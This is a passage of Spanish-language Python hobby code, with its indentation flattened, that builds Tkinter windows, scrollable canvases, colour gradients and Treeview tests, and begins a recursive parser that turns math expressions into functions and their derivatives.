#polig(50,ySuma,int(strPixel("abc defg_hijklmnñopqrstuvwxyz....."[0:x])),20,radio=5,text=str("abc defg_hijklmnñopqrstuvwxyz.....")[0:x])
polig(50,ySuma,x,20,radio=5,text=letra*repeticiones,fontSize=fontSize,fontType=fontType,fill='#0f0f0f',outline='#010101',alcance=int(ancho*0.8))
#circulin(radio=10,Cx=25,Cy=ySuma,grado0=0,gradoF=int(360/(34-x)))
ySuma += 30
miFrameinicio.configure(width = ancho, height=ySuma+100)
cu.configure(width = ancho, height=ySuma+100)
raiz.update()
widgets={}
v={}
label={}
raiz=Tk()
raiz.title("El Mejor Cajero del Mundo")
scrollbar=Scrollbar(raiz)
c = Canvas(raiz, yscrollcommand=scrollbar.set)
scrollbar.config(command=c.yview)
scrollbar.pack(side=RIGHT, fill=Y)
miFrameinicio=Frame(c)
miFrameinicio.configure(width = ancho, height=largo)
cu=Canvas(miFrameinicio, width=ancho, height=largo, background=fondor)
cu.place(x=-1, y=-1)
c.pack(side="left" , fill="both", expand=True)
c.create_window(0,0,window=miFrameinicio, anchor='nw')
c.config(scrollregion=c.bbox("all"))
v['fontType']=StringVar(value=str('Arial'))
v['letra']=StringVar(value=str('a'))
v['fontSize']=IntVar(value=11)
v['desde']=IntVar(value=50)
v['hasta']=IntVar(value=100)
v['pasos']=IntVar(value=5)
v['repeticiones']=IntVar(value=20)
#Separator(self.raiz, orient=HORIZONTAL)
label['fontSize']=Label(miFrameinicio, text='fontSize',fg=fondor,bg=fondo,font=("Arial",10),bd=0,justify="left",anchor=E)
label['fontSize'].place(x=10, y=10)
widgets['fontSize']=Entry(miFrameinicio,textvariable=v['fontSize'])
widgets['fontSize'].place(x=10, y=45)
label['fontType']=Label(miFrameinicio, text='fontType',fg=fondor,bg=fondo,font=("Arial",10),bd=0,justify="left",anchor=E)
label['fontType'].place(x=150, y=10)
widgets['fontType']=Entry(miFrameinicio,textvariable=v['fontType'])
widgets['fontType'].place(x=150, y=45)
label['letra']=Label(miFrameinicio, text='letra',fg=fondor,bg=fondo,font=("Arial",10),bd=0,justify="left",anchor=E)
label['letra'].place(x=290, y=10)
widgets['letra']=Entry(miFrameinicio,textvariable=v['letra'])
widgets['letra'].place(x=290, y=45)
label['desde']=Label(miFrameinicio, text='desde',fg=fondor,bg=fondo,font=("Arial",10),bd=0,justify="left",anchor=E)
label['desde'].place(x=10, y=65)
widgets['desde']=Entry(miFrameinicio,textvariable=v['desde']) # keep the widget reference; .place() returns None
widgets['desde'].place(x=10, y=100)
label['hasta']=Label(miFrameinicio, text='hasta',fg=fondor,bg=fondo,font=("Arial",10),bd=0,justify="left",anchor=E)
label['hasta'].place(x=150, y=65)
widgets['hasta']=Entry(miFrameinicio,textvariable=v['hasta'])
widgets['hasta'].place(x=150, y=100)
label['pasos']=Label(miFrameinicio, text='pasos',fg=fondor,bg=fondo,font=("Arial",10),bd=0,justify="left",anchor=E)
label['pasos'].place(x=290, y=65)
widgets['pasos']=Entry(miFrameinicio,textvariable=v['pasos'])
widgets['pasos'].place(x=290, y=100)
label['repeticiones']=Label(miFrameinicio, text='repeticiones',fg=fondor,bg=fondo,font=("Arial",10),bd=0,justify="left",anchor=E)
label['repeticiones'].place(x=10, y=120)
widgets['repeticiones']=Entry(miFrameinicio,textvariable=v['repeticiones'])
widgets['repeticiones'].place(x=10, y=155)
widgets['boton']=Button(miFrameinicio,text='Dibujar',command=lambda: dibujar(v),width=5,bg='#2e2e2e') # keep the widget reference; .place() returns None
widgets['boton'].place(x=150,y=155)
raiz.geometry(str(ancho)+"x"+str(alto)+"+10+10")
raiz.update()
c.config(scrollregion=c.bbox("all"))
#print(foco)
#threading.Thread(target=crono).start()
raiz.mainloop()
def totalScroll():
from myVars import inputsDefault
from tkinter import ttk
root=Tk()
#root.wm_attributes('-alpha',0.5)
# with Windows OS
root.bind("<MouseWheel>",lambda event: canvas.yview_scroll(int(-1*(event.delta/120)), "units"))
root.bind("<Destroy>",lambda event: print('<Destroy>') )
#root.bind("<Leave>",lambda event: print('<Leave>') )
root.bind("<Map>",lambda event: print(event) )
root.bind("<Expose>",lambda event: print(event) )
#root.bind("<13>",lambda event: print('<GraphicsExpose>',event) )
#root.bind("<NoExpose>",lambda event: print('<NoExpose>') )
root.bind("<Visibility>",lambda event: print(event) )
#root.bind("<UnMap>",lambda event: print('<UnMap>') )
root.bind("<MapRequest>",lambda event: print('<MapRequest>') )
root.bind("<Reparent>",lambda event: print('<Reparent>') )
#root.bind("<Selection>",lambda event: print('<Selection>') )
#root.bind("<Mapping>",lambda event: print('<Mapping>') )
root.bind("<Activate>",lambda event: print('<Activate>') )
root.bind("<Deactivate>",lambda event: print('<Deactivate>') )
#root.bind("<SelectionClear>",lambda event: print('<SelectionClear>') )
root.bind("<FocusIn>",lambda event: print(event) )
root.bind("<FocusOut>",lambda event: print('<FocusOut>') )
root.bind("<Gravity>",lambda event: print('<Gravity>') )
#root.bind("<Keymap>",lambda event: print('<Keymap>') )
root.bind("<Create>",lambda event: print('<Create>') )
root.bind("<Circulate>",lambda event: print('<Circulate>') )
#root.bind("<>",lambda event: print('<>') )
root.bind("<Property>",lambda event: print('<Property>') )
root.bind("<Configure>",lambda event: print(event) )
# with Linux OS
#root.bind("<Button-4>",MouseWheelHandler)
#root.bind("<Button-5>",MouseWheelHandler)
f = Frame(root)
width = height = 100
canvas=Canvas(f)
yscrollbar = Scrollbar(f, orient='vertical',command=canvas.yview)
xscrollbar = Scrollbar(f, orient='horizontal',command=canvas.xview)
frame=Frame(canvas)
print(canvas.bbox("all"))
frame.bind("<Configure>",lambda e: canvas.configure(scrollregion=canvas.bbox("all")))
canvas.create_window((0, 0), window=frame, anchor="nw") # this line is equivalent to: frame.pack(in_=canvas,anchor="nw")
canvas.configure(xscrollcommand=xscrollbar.set,yscrollcommand=yscrollbar.set)
yscrollbar.pack(side='right', fill='y')
xscrollbar.pack(side='bottom', fill='x')
f.pack(expand=1, fill='both')
canvas.pack(side='left', fill='both', expand=1)
for x in range(10):
Label(frame, text='Prueba Label '+str('@'*(x+1)),bg='#f0f0f0').pack()
tree = ttk.Treeview(frame,columns=tuple('#'+str(c+1) for c in range(len(inputsDefault['help']))))
tree.pack()
tree.heading("#0", text="ID")
num=['#'+str(c+1) for c in range(len(inputsDefault['help']))]
count=0
for c in inputsDefault['help']:
print(str(c))
tree.heading(str(num[count]), text=c) # 'width' is a column option, not a heading option
tree.column(str(num[count]), width=50)
count += 1
#
count=0
for c in inputsDefault:
#inputsDefault[c]['id']=count
if inputsDefault[c]:
tree.insert("", END, text=count,
values=tuple(inputsDefault[c][h] for h in inputsDefault[c]))
count += 1
root.update()
root.mainloop()
def canvasGradient(padre,color1,color2):
escala={'0':0,'1':1,'2':2,'3':3,'4':4,'5':5,'6':6,'7':7,'8':8,'9':9,'a':10,'b':11,'c':12,'d':13,'e':14,'f':15}
r1=float((escala[color1[1:3][0]])*16+(escala[color1[1:3][1]]))
g1=float((escala[color1[3:5][0]])*16+(escala[color1[3:5][1]]))
b1=float((escala[color1[5:][0]])*16+(escala[color1[5:][1]]))
r2=float((escala[color2[1:3][0]])*16+(escala[color2[1:3][1]]))
g2=float((escala[color2[3:5][0]])*16+(escala[color2[3:5][1]]))
b2=float((escala[color2[5:][0]])*16+(escala[color2[5:][1]]))
height=padre.winfo_height()
width=padre.winfo_width()
c=Canvas(padre,height=padre.winfo_height(),width=padre.winfo_width())
print((c,height,width,color1,color2))
r=(r2-r1)/width
g=(g2-g1)/width
b=(b2-b1)/width
for i in range(width):
RR=int(r1+(r*i))
GG=int(g1+(g*i))
BB=int(b1+(b*i))
color='#'+("" if RR>15 else "0")+str(hex(RR))[2:]+("" if GG>15 else "0")+str(hex(GG))[2:]+("" if BB>15 else "0")+str(hex(BB))[2:]
c.create_line(i,0,i,height,fill=color) # each vertical line spans the full canvas height
#,tags=("gradient",)
return c
def Gradient(padre,color1,color2):
escala={'0':0,'1':1,'2':2,'3':3,'4':4,'5':5,'6':6,'7':7,'8':8,'9':9,'a':10,'b':11,'c':12,'d':13,'e':14,'f':15}
r1=float((escala[color1[1:3][0]])*16+(escala[color1[1:3][1]]))
g1=float((escala[color1[3:5][0]])*16+(escala[color1[3:5][1]]))
b1=float((escala[color1[5:][0]])*16+(escala[color1[5:][1]]))
r2=float((escala[color2[1:3][0]])*16+(escala[color2[1:3][1]]))
g2=float((escala[color2[3:5][0]])*16+(escala[color2[3:5][1]]))
b2=float((escala[color2[5:][0]])*16+(escala[color2[5:][1]]))
height=padre.winfo_height()
width=padre.winfo_width()
r=(r2-r1)/width
g=(g2-g1)/width
b=(b2-b1)/width
lines=[]
for i in range(width):
RR=int(r1+(r*i))
GG=int(g1+(g*i))
BB=int(b1+(b*i))
color='#'+("" if RR>15 else "0")+str(hex(RR))[2:]+("" if GG>15 else "0")+str(hex(GG))[2:]+("" if BB>15 else "0")+str(hex(BB))[2:]
lines +=[[i,0,i,height,color]]
#,tags=("gradient",)
return lines
def ventanaPersonalizada():
global myX, myY,rootX,rootY,myFoco,fullalto,fullancho,ancho,alto
myX=10
myY=10
rootX=10
rootY=10
ancho=500
alto=300
global lapsoRoot,lapsoOculto
lapsoRoot=time.time()
lapsoOculto=time.time()
def expandir(v):
global fullalto,fullancho,ancho,alto
if v:
btnMax.config(command=lambda:expandir(0))
oculto.geometry('{0}x{1}+0+0'.format(10,10))
root.geometry('{0}x{1}+0+0'.format(fullancho,fullalto-50))
root.update()
else:
btnMax.config(command=lambda:expandir(1))
oculto.geometry('{0}x{1}+0+0'.format(10,10))
root.geometry('{0}x{1}+0+0'.format(ancho,alto))
root.update()
def select(w='force',event=''):
global myFoco,lapsoRoot
if event=='':
return 'Null'
elif event=='FocusIn' and w=='oculto':
myFoco.set('otro')
lapsoRoot=time.time()+0.01
t='FocusIn'
else:
t=str(event.type)
if w=='root' and "FocusIn" in t :
myFoco.set('root')
if w=='root' and "FocusOut" in t :
myFoco.set('otro')
lapsoRoot=time.time()
if w=='oculto' and "FocusIn" in t:
root.focus_force()
myFoco.set('oculto')
lapsoOculto=time.time()
if w=='oculto' and "FocusOut" in t:
myFoco.set('otro')
if (time.time()-lapsoRoot)<0.50 and myFoco.get()=='oculto':
root.withdraw()
oculto.iconify()
print('Min')
elif (time.time()-lapsoRoot)>0.50 and myFoco.get()=='otro':
root.deiconify()
oculto.geometry('+{0}+{1}'.format(root.geometry().split('+')[1],root.geometry().split('+')[2]))
root.focus_force()
print('Max')
print(myFoco.get())
def radar(event):
#print(str(event.state))
if '8' in str(event.state):
x=event.x_root-int(root.geometry().split('+')[1])
y=event.y_root-int(root.geometry().split('+')[2])
n=s=e=o=0
if (root.winfo_height()-y)<10:
s=1
if (root.winfo_width()-x)<10:
e=1
if (y)<10:
n=1
if (x)<10:
o=1
#print(x,y,n,s,e,o)
def move_window(event):
global myX, myY,rootX,rootY
if event.widget==tituloCanvas and "ButtonPress" in str(event.type) :
myX=event.x_root
myY=event.y_root
if event.widget==tituloCanvas and "Motion" in str(event.type) :
#print(event)
x=event.x_root-int(root.geometry().split('+')[1])
y=event.y_root-int(root.geometry().split('+')[2])
if ((y-myY)!=0 or (x-myX)!=0):
#root.geometry('+{0}+{1}'.format(int(event.x_root-x),int(event.y_root-y)))
oculto.geometry('+{0}+{1}'.format(int(event.x_root-x)+int(event.x_root-myX)+10,int(event.y_root-y)+int(event.y_root-myY)+10))
root.geometry('+{0}+{1}'.format(int(event.x_root-x)+int(event.x_root-myX),int(event.y_root-y)+int(event.y_root-myY)))
myX=event.x_root
myY=event.y_root
#root.focus()
oculto=Tk()
oculto.iconify()
myFoco=StringVar(value=str('root'))
#myFoco.trace('w',lambda name,arg,mod :print(myFoco.get()))
oculto.bind("<Destroy>",lambda event :root.destroy())
oculto.bind("<FocusOut>",lambda e :select('oculto',event=e) )
oculto.bind("<FocusIn>",lambda e :select('oculto',event=e) )
#oculto.bind("<FocusOut>",lambda event :print("FocusOut Oculto") )
#oculto.bind("<Configure>",lambda event :print("Configure Oculto") )
oculto.geometry(str(10)+"x"+str(10)+"+10+10")
root=Tk()
root.bind("<Destroy>",lambda e :oculto.destroy() if oculto else print('Listo') )
root.bind("<FocusOut>",lambda e :select('root',event=e) )
root.bind("<FocusIn>",lambda e :select('root',event=e) )
root.overrideredirect(True)
root.geometry(str(ancho)+"x"+str(alto)+"+10+10")
titulo=Frame(root,relief='flat',bd=0)
titulo.pack(expand=1,side='top', fill='x')
btnSalir=Button(titulo,text='X',command=lambda:root.destroy(),width=5,bg='#2e2e2e',padx=2,pady=2,activebackground='red',bd=0,font='bold',fg='#ffffff',highlightthickness=0)
btnMax=Button(titulo,text='+',command=lambda:expandir(1),width=5,bg='#2e2e2e',padx=2,pady=2,activebackground='blue',bd=0,font='bold',fg='#ffffff',highlightthickness=0)
btnMin=Button(titulo,text='-',command=lambda:select('oculto',event='FocusIn'),width=5,bg='#2e2e2e',padx=2,pady=2,activebackground='white',bd=0,font='bold',fg='#ffffff',highlightthickness=0)
btnSalir.pack(side='right')
btnMax.pack(side='right')
btnMin.pack(side='right')
btnSalir.bind("<Leave>",lambda event :event.widget.config(bg='#2e2e2e'))#color cuando el mouse no esta por ensima de este Widget
btnSalir.bind("<Enter>",lambda event :event.widget.config(bg='#891010'))#color cuando el mouse Si esta por ensima de este Widget
btnMax.bind("<Leave>",lambda event :event.widget.config(bg='#2e2e2e'))#color cuando el mouse no esta por ensima de este Widget
btnMax.bind("<Enter>",lambda event :event.widget.config(bg='#891010'))#color cuando el mouse Si esta por ensima de este Widget
btnMin.bind("<Leave>",lambda event :event.widget.config(bg='#2e2e2e'))#color cuando el mouse no esta por ensima de este Widget
btnMin.bind("<Enter>",lambda event :event.widget.config(bg='#891010'))#color cuando el mouse Si esta por ensima de este Widget
root.bind("<B1-Motion>",move_window)#move_window(even)
root.bind("<Motion>",radar)
root.bind("<MouseWheel>",lambda event: canvas.yview_scroll(int(-1*(event.delta/120)), "units"))
# with Linux OS
#root.bind("<Button-4>",MouseWheelHandler)
#root.bind("<Button-5>",MouseWheelHandler)
f = Frame(root,relief='flat',bd=0,highlightthickness=0)
canvas=Canvas(f,bd=0,highlightthickness=0)
yscrollbar = Scrollbar(f, orient='vertical',command=canvas.yview,bd=0,highlightthickness=0)
xscrollbar = Scrollbar(f, orient='horizontal',command=canvas.xview,bd=0,highlightthickness=0)
frame=Frame(canvas,bd=0,highlightthickness=0)
frame.bind("<Configure>",lambda e: canvas.configure(scrollregion=canvas.bbox("all")))
canvas.create_window((0, 0), window=frame, anchor="nw") # this line is equivalent to: frame.pack(in_=canvas,anchor="nw")
canvas.configure(xscrollcommand=xscrollbar.set,yscrollcommand=yscrollbar.set)
yscrollbar.pack(side='right', fill='y')
xscrollbar.pack(side='bottom', fill='x')
f.pack(side='bottom', fill='x', expand=1)
canvas.pack(side='left', fill='both', expand=1)
raiz=Canvas(frame,bd=0,highlightthickness=0)
raiz.pack(in_=frame,fill='both',expand=1)
for x in range(100):
Label(raiz, text='Prueba Label '+str('@'*(x+1)),bg='#f0f0f0').pack()
root.update()
print(frame.winfo_width())
for line in Gradient(raiz,'#0f0000','#ff0f0f'):
print(line)
raiz.create_line(line[0],line[1],line[2],line[3],fill=line[4])
#tituloCanvas=Canvas(titulo,height=titulo.winfo_height(),width=titulo.winfo_width(),bg='#ff0000')
tituloCanvas=canvasGradient(titulo,'#ff0f0f','#0f0000')
tituloCanvas.config(bd=0,highlightthickness=0)
tituloCanvas.pack(in_=titulo)
tituloCanvas.bind("<Button>",move_window)
fullancho=root.winfo_screenwidth()
fullalto=root.winfo_screenheight()
root.focus_force()
#root.()
print('root.winfo_visual()',root.winfo_visual())
print('root.state()',root.state())
print('root.iconwindow()',root.iconwindow())
print('root.winfo_visual()',root.winfo_visual())
print('root.state()',root.state())
print('root.frame()',root.frame())
print('root.focusmodel()',root.focusmodel())
print('root.attributes()',root.attributes())
print('root.aspect()',root.aspect())
print('root.client()',root.client())
print('root.winfo_manager()',root.winfo_manager())
root.mainloop()
oculto.mainloop()
def pruebaTreeview():
from myVars import inputsDefault
from tkinter import ttk
window = Tk()
treeview = ttk.Treeview(window)
treeview.pack()
treeview.insert("", END, text="Elemento 1")
item = treeview.insert("", END, text="Elemento 2")
treeview.insert(item, END, text="Subelemento 2")
# Print the items of the tree.
print(treeview.get_children())
# Print the items inside "Elemento 2" (the item created above).
print(treeview.get_children(item))
item1 = treeview.insert("", END, text="Elemento 1")
item2 = treeview.insert("", END, text="Elemento 2")
# We can move "Elemento 1" inside "Elemento 2" via:
treeview.move(item1, item2, END)
# Delete "Elemento 2".
item1 = treeview.insert("", END, text="Elemento 1")
item2 = treeview.insert("", END, text="Elemento 2")
treeview.delete(item2)
# Detach "Elemento 1".
treeview.detach(item1)
print(treeview.exists(item2)) # False.
print(treeview.exists(item1)) # True.
treeview.focus(item) # Set the focus on item.
print(treeview.focus()) # Returns the ID of item.
item1 = treeview.insert("", END, text="Elemento 1")
item2 = treeview.insert("", END, text="Elemento 2")
print(treeview.index(item1)) # 0
print(treeview.index(item2)) # 1
print(inputsDefault['help'])
print(tuple(c for c in inputsDefault['help'] if c!='id'))
tree = ttk.Treeview(window,columns=tuple('#'+str(c+1) for c in range(len(inputsDefault['help']))))
tree.pack()
tree.heading("#0", text="ID")
num=['#'+str(c+1) for c in range(len(inputsDefault['help']))]
count=0
for c in inputsDefault['help']:
print(str(c))
tree.heading(str(num[count]), text=c)
count += 1
#
count=0
for c in inputsDefault:
#inputsDefault[c]['id']=count
if inputsDefault[c]:
tree.insert("", END, text=count,
values=tuple(inputsDefault[c][h] for h in inputsDefault[c]))
count += 1
#tree.insert(inputsDefault[c]['id'],inputsDefault[c]['id'], inputsDefault[c]['id'])
#tree.insert("", END, text="README.txt",values=("850 bytes", "18:30"))
# Prints {'lastmod': '18:30', 'size': '850 bytes'}.
print(tree.set(item))
window.mainloop()
def unicodeP(string='',variable='',desde=0,hasta=125):
listaunicode={}
mayuscula=[]
minuscula=[]
string=string.strip()
if ('(' in string[0]) and (')' in string[-1]):
string=string[1:-1]
string=string.strip()
for l in string:
if (97<=ord(l) and ord(l)<=122):
if not l in minuscula:
minuscula += [l]
if (65<=ord(l) and ord(l)<=90):
if not l in mayuscula:
mayuscula += [l]
p=[]
for x in range(desde,hasta,1):
p+=[[x,str(chr(int(x)))]]
print(p[-1])
print(p)
def strToMath(string='',variable='x',dy=0,p=0,c=None,decimales=4,signo=None,v=0,composicion=0):
if not v:
print('validando',string,composicion)
v=1
composicion += 1
nivel=0
esSuma=0
signoSuma=[0]
esProducto=0
signoProducto=[0]
esDivision=0
signoDivision=[0]
esExponente=0
signoExponente=[0]
esResto=0
signoResto=[0]
constantes={'e':math.e,'pi':3.1416,'g':9.8182}
operador=1
operadores=['w','sen','cos','tg','log','ln','lambert','dy','sec','cosec','cotag','arcsen','arccos','arctg','round','floor','ceil','signo','abs']
simbolos=['*','(',')','/','+','-','.','%']
monomio=1
parentesis=1
string=string.strip()
for x in range(0,len(string),1):
if string[x]=='(':
nivel += 1
if string[x]==')':
nivel -= 1
if string[x] in '-+' and nivel==0:
if x>0:
monomio=0
if string[x] in '-+*/%' and nivel==0:
if x>0:
parentesis=0
if monomio:
if string[0] in '+' and nivel==0:
sig= 1.0
string=string[1:]
elif string[0] in '-' and nivel==0:
sig=-1.0
string=string[1:]
else:
sig= 1.0
string=string.strip()
else:
sig=1.0
if parentesis:
if ('(' in string[0]) and (')' in string[-1]):
string=string[1:-1]
string=string.strip()
monomio=1
parentesis=1
string=string.strip()
for x in range(0,len(string),1):
if string[x]=='(':
nivel += 1
if string[x]==')':
nivel -= 1
if string[x] in '-+' and nivel==0:
if x>0:
monomio=0
if string[x] in '-+*/%' and nivel==0:
if x>0:
parentesis=0
if monomio:
if string[0] in '+' and nivel==0:
sig= 1.0*sig
string=string[1:]
elif string[0] in '-' and nivel==0:
sig=-1.0*sig
string=string[1:]
string=string.strip()
if parentesis:
if ('(' in string[0]) and (')' in string[-1]):
string=string[1:-1]
string=string.strip()
for x in range(0,len(string),1):
if string[x]=='(':
nivel += 1
if string[x]==')':
nivel -= 1
if string[x] in '-+' and nivel==0:
if x>0:
esSuma=1
signoSuma += [x]
if not monomio:
operador=0
if (string[x] == '*') and ( '*' != string[x+1]) and ( '*' != string[x-1]) and nivel==0:
esProducto=1
signoProducto += [x]
operador=0
if string[x] in '/' and nivel==0:
esDivision=1
signoDivision += [x]
operador=0
if (string[x] == '*') and ( '*' == string[x+1]) and nivel==0:
esExponente=1
signoExponente += [x]
operador=0
if (string[x] == '%') and nivel==0:
esResto=1
signoResto += [x]
operador=0
if operador:
x=0
coincide=[op for op in operadores if op in (string if len(op)<len(string) else '')]
if coincide:
print(coincide)
comas=[0]
for x in range(0,len(string),1):
if string[x]=='(':
nivel += 1
if string[x]==')':
nivel -= 1
if string[x] in ',' and nivel==0:
comas += [x]
if string[:len('w')] in 'w' and nivel==0:
pass
if string[:len('dy')] in 'dy' and nivel==0:
pass
if string[:len('log')] in 'log' and nivel==0:
#math.log(x,base)
print('log',string)
parteReal=strToMath(string=string[len('log'):comas[1]],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
if len(comas)==1:
base=strToMath(string='10.0',dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
else:
base=strToMath(string=string[comas[1]+1:-1],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def logaritmoNatural(x,dy=dy,p=p,decimales=decimales,signo=sig,mostrarSigno=0,parteReal=parteReal,base=base):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
numerador='(('+parteReal(x,p=p,dy=1,decimales=decimales,mostrarSigno=1)+'/'+parteReal(x,p=p,dy=0,decimales=decimales,mostrarSigno=1)+')-('+parteReal(x,p=p,dy=1,decimales=decimales,mostrarSigno=1)+'/'+parteReal(x,p=p,dy=0,decimales=decimales,mostrarSigno=1)+'))'
return s+'('+numerador+'/'+parteReal(x,p=p,dy=0,decimales=decimales,mostrarSigno=1)+')'
else:
numerador=signo*((parteReal(x,p=p,dy=1,decimales=decimales,mostrarSigno=1)/parteReal(x,p=p,dy=0,decimales=decimales,mostrarSigno=1))-(base(x,p=p,dy=1,decimales=decimales,mostrarSigno=1)/base(x,p=p,dy=0,decimales=decimales,mostrarSigno=1)))
return numerador/((math.log(base(x,p=p,dy=1,decimales=decimales,mostrarSigno=1)))**2)
else:
if p:
return s+'ln('+parteReal(x,p=p,decimales=decimales,mostrarSigno=1)+','+base(x,p=p,decimales=decimales,mostrarSigno=1)+')'
else:
return signo*math.log(parteReal(x),base(x))
return logaritmoNatural
if string[:len('ln')] in 'ln' and nivel==0:
#math.log(x,base)
print('ln',string)
parteReal=strToMath(string=string[len('ln'):],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def logaritmoNatural(x,dy=dy,p=p,decimales=decimales,signo=sig,mostrarSigno=0,parteReal=parteReal):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
return s+'('+parteReal(x,p=p,dy=1,decimales=decimales,mostrarSigno=1)+'/'+parteReal(x,p=p,dy=0,decimales=decimales,mostrarSigno=1)+')'
else:
return signo*(parteReal(x,p=p,dy=1,decimales=decimales,mostrarSigno=1)/parteReal(x,p=p,dy=0,decimales=decimales,mostrarSigno=1))
else:
if p:
return s+'ln('+parteReal(x,p=p,decimales=decimales,mostrarSigno=1)+')'
else:
return signo*math.log(parteReal(x))
return logaritmoNatural
if string[:len('abs')] in 'abs' and nivel==0:
#math.fabs(-66.43)
print('abs',string)
valor=strToMath(string=string[len(''):],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def valorAbsoluto(x,dy=dy,p=p,decimales=decimales,signo=sig,mostrarSigno=0,u=valor):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
return s+'(('+valor(x,p=p,dy=0,decimales=decimales,mostrarSigno=1)+'/abs('+valor(x,p=p,dy=0,decimales=decimales,mostrarSigno=1)+'))*('+valor(x,p=p,dy=1,decimales=decimales,mostrarSigno=1)+'))'
else:
return signo*((valor(x,p=p,dy=0,decimales=decimales)/math.fabs(valor(x,p=p,dy=0,decimales=decimales)))*valor(x,p=p,dy=1,decimales=decimales))
else:
if p:
return s+'abs('+valor(x,p=p,decimales=decimales,mostrarSigno=1)+')'
else:
return signo*math.fabs(valor(x))
return valorAbsoluto
if string[:len('tg')] in 'tg' and nivel==0:
#math.tan()
print('tg',string)
radian=strToMath(string=string[len('tg'):],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def tangente(x,dy=dy,p=p,decimales=decimales,signo=sig,mostrarSigno=0,radian=radian):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
return s+'((1+tg('+radian(x,dy=0,p=p,decimales=decimales,mostrarSigno=1)+')**2)*('+radian(x,dy=dy,p=p,decimales=decimales,mostrarSigno=1)+'))'
else:
return signo*(1+math.tan(radian(x))**2)*radian(x,dy=dy)
else:
if p:
return s+'tg('+radian(x,dy=dy,p=p,decimales=decimales,mostrarSigno=1)+')'
else:
return signo*math.tan(radian(x))
return tangente
if string[:len('sen')] in 'sen' and nivel==0:
#math.sin()
print('sen',string)
radian=strToMath(string=string[len('sen'):],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def seno(x,dy=dy,p=p,decimales=decimales,signo=sig,mostrarSigno=0,radian=radian):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
return s+'(cos('+radian(x,dy=0,p=p,decimales=decimales,mostrarSigno=1)+')*('+radian(x,dy=dy,p=p,decimales=decimales,mostrarSigno=1)+'))'
else:
return signo*math.cos(radian(x))*radian(x,dy=dy)
else:
if p:
return s+'sen('+radian(x,dy=dy,p=p,decimales=decimales,mostrarSigno=1)+')'
else:
return signo*math.sin(radian(x))
return seno
if string[:len('cos')] in 'cos' and nivel==0:
#math.cos()
print('cos',string)
radian=strToMath(string=string[len('cos'):],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def coseno(x,dy=dy,p=p,decimales=decimales,signo=sig,mostrarSigno=0,radian=radian):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
s=('-' if signo>0.0 else '+') if mostrarSigno else ''
return s+'(sen('+radian(x,dy=0,p=p,decimales=decimales,mostrarSigno=1)+')*('+radian(x,dy=dy,p=p,decimales=decimales,mostrarSigno=1)+'))'
else:
return -1*signo*math.sin(radian(x))*radian(x,dy=dy,p=p,decimales=decimales,mostrarSigno=1)
else:
if p:
return s+'cos('+radian(x,dy=dy,p=p,decimales=decimales,mostrarSigno=1)+')'
else:
return signo*math.cos(radian(x))
return coseno
if string[:len('arcsen')] in 'arcsen' and nivel==0:
#math.asin()
pass
if string[:len('arccos')] in 'arccos' and nivel==0:
#math.acos()
pass
if string[:len('arctg')] in 'arctg' and nivel==0:
#math.atan()
pass
if string[:len('signo')] in 'signo' and nivel==0:
pass
if string[:len('entero')] in 'entero' and nivel==0:
pass
if string[:len('decimal')] in 'decimal' and nivel==0:
pass
if string[:len('round')] in 'round' and nivel==0:
print('round',string)
redondeo=strToMath(string=string[len('round'):],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def redondear(x,dy=dy,p=p,decimales=decimales,signo=sig,mostrarSigno=0,redondeo=redondeo):
if mostrarSigno:
s='+' if signo>=0.0 else '-'
else:
s=''
if dy:
if p:
return '0.0'
else:
return 0.0
else:
if p:
return s+'round('+redondeo(x,p=p,decimales=decimales,mostrarSigno=1)+')' # use the parsed sub-expression ('redondeo'), not an undefined name
else:
return signo*round(redondeo(x)) # math has no 'round'; use the builtin
return redondear
if string[:len('floor')] in 'floor' and nivel==0:
print('floor',string)
defecto=strToMath(string=string[len('floor'):],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def redondearHaciaAbajo(x,dy=dy,p=p,decimales=decimales,signo=sig,mostrarSigno=0,defecto=defecto):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
return '0.0'
else:
return 0.0
else:
if p:
return s+'floor('+defecto(x,p=p,decimales=decimales,mostrarSigno=1)+')'
else:
return signo*math.floor(defecto(x))
return redondearHaciaAbajo
if string[:len('ceil')] in 'ceil' and nivel==0:
print('ceil',string)
exceso=strToMath(string=string[len('ceil'):],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def redondearHaciaArriba(x,dy=dy,p=p,decimales=decimales,signo=sig,mostrarSigno=0,exceso=exceso):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
return '0.0'
else:
return 0.0
else:
if p:
return s+'ceil('+exceso(x,p=p,decimales=decimales,mostrarSigno=1)+')'
else:
return signo*math.ceil(exceso(x))
return redondearHaciaArriba
else:
esConstante=1
"""
if string[:len('')] in '' and nivel==0:
print('',string)
=strToMath(string=string[len(''):],dy=dy,p=p,decimales=decimales,v=v)
def op(x,dy=dy,p=p,decimales=decimales,signo=sig,mostrarSigno=0):
#f(x,dy=dy,p=p,decimales=decimales,mostrarSigno=0)
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
return s
else:
ret =
return signo*ret
else:
if p:
return s
else:
return signo*
return op
"""
else:
c=None
if string in constantes:
c=constantes[string]
elif sum([1 for l in string if ((48<=ord(l) and ord(l)<=57) or (ord(l)==46))])==len(string):
c=float(string)
if c:
print('constante',c)
def constante(x,dy=dy,p=p,c=c,decimales=decimales,signo=sig,mostrarSigno=0):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
return '0.'+'0'*decimales
else:
return 0
else:
if p:
